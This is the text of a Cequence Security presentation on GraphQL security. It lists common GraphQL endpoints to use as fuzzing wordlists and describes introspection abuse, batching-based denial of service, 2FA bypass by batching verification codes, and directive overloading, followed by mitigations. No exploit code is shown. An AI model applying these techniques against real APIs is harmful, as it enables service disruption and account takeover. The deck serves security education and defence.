The Darkside of GraphQL GraphQL is so query-ous, it's bound to leave you REST-less. 02.28.2023 

Why GraphQL ? ➔Increased efficiency - Request exact data you need. Nothing More, Nothing Less ➔Better flexibility - Evolve and iterate on the API without impacting clients ➔Facilitates collaboration - GraphQL provides a common language for both frontend and backend Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED PUN Why settle for the simplicity of REST when you can spend your days writing complex GraphQL schemas that nobody understands? 

How is GraphQL Different from REST ? Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED 

Common GraphQL Endpoints Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED TIP I would rather create a wordlist of common GraphQL Endpoints and pass it to FFUF, DirBuster, etc 1./graphql 2./graphql.php 3./graphiql 4./v1/explorer 5./v1/graphiql 6./v2/graphql/console List of Common API Endpoints 

DIFFERENT TYPES OF QUERIES IN GRAPHQL Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED PUN "A GraphQL query is like a conversation with a waiter at a restaurant. You tell the waiter what you want to eat (i.e., the data you want to retrieve), and the waiter brings it to your table. But unlike a restaurant, you don't have to leave a tip!" 

Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED QUERY A query is used to retrieve data from a GraphQL server. It is analogous to a GET request in a REST API. A query consists of a set of fields that define the data that the client wants to fetch from the server. A mutation is used to modify data on a GraphQL server. It is analogous to a POST, PUT, or DELETE request in a REST API. A mutation consists of a set of input arguments and fields that define the data that the client wants to change on the server. A subscription is used to receive real-time updates from a GraphQL server. It is similar to a query, but instead of returning a single result, a subscription returns a stream of data that is sent to the client whenever the server's data changes. MUTATION SUBSCRIPTION 

ATTACKER'S PERSPECTIVE TO GRAPHQL Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED PUN Why did the GraphQL developer refuse to use REST? Because they didn't want to get caught up in a "REST-riction" when it came to querying data! 

THE INTROSPECTION Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED PUN Why did the GraphQL schema go to therapy? Because it needed some introspecc-tion! GraphQL introspection is a feature that allows a GraphQL client to query the GraphQL schema at runtime to get information about the available types, fields, and directives that the schema supports. This information can be used to understand the schema's structure, generate documentation, or even to dynamically generate GraphQL queries and mutations. INTROSPECTION QUERY 

Introspection can reveal sensitive information about the application's underlying data model. Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED Why is Introspection a vulnerability? TIP The output of Introspection might not be readable. To view in much better way use “apis.guru/graphql- voyager/” 

Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED why we use graphql- voyager? 

Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED I call it "The Voyager Magic" 

Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED 

Batching is a technique used in GraphQL to optimize queries by allowing multiple queries to be sent in a single HTTP request Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED Can we exploit Batching in GraphQL? TIP GraphQL batching is not inherently a vulnerability but … let's find out 

EXPLOIT FOR BATCHING Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED TIP Use “BatchQL” tool by AssetNote. The most common attack for batching is Denial of Service (DoS) attack. If an attacker sends a large number of batched queries that require significant processing, it could cause the server to become overwhelmed and result in a denial- of-service attack. PoC in Next Slide 

Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED Note the Execution Time 

Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED Ahm... Ahm... 

Authentication Bypass with the help of Batching. Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED TIP Majorly works where 2Fa is present. 

BYPASSING 2FA Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED TIP Use “BatchQL” tool by AssetNote. We can see that we pass 3 different verification code and even if one code is correct, we will get the successful response. Credit: Assetnote 

Testing for Directive Overloading Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED TIP Directive overloading is neglected because developers and hackers are concentrating on Batching. Let's see a Live PoC 

WHAT ARE RUNTIME DIRECTIVES? Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED The purpose of runtime directives is to modify the execution. There are two main runtime directives in GraphQL: @skip and @include • @skip(if: ...) skips the selection if the if: ... value is truthy • @include(if: ...) includes the selection if the if: ... value is truthy Note the Execution Time TIP Multiple errors confirms that server is vulnerable to directive overloading. 

Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED 

POSSIBLE MITIGATIONS Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED • Implement depth limiting for incoming GraphQL queries • Perform query cost analysis to limit expensive queries • Enforce rate-limiting for incoming requests per API client • Add timeouts for both the infrastructure and API layer • Disable introspection queries in public APIs • Use a whitelist for allowed characters • Add pagination to limit the amount of information that can be accessed by a single request 

To Succeed, Security Teams Need Unified API Protection An Integrated Solution Across the Entire API Protection Lifecycle Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED Continuous API Protection Lifecycle Discovery Identify Public Facing APIs Inventory Provide Unified Inventory of ALL APIs Compliance Ensure Adherence to Security and Governance Best Practices Testing Secure New APIs Before Go-Live Prevention Block Attacks Natively in Real Time Detection Detect Attacks as They Happen 

Thank You Merci Gracias Danke Copyright ©2023 Cequence Security | ALL RIGHTS RESERVED Did someone mention that Cequence can provide you with free security assessment? Grazie Dhanyavaad Shukraan Arigato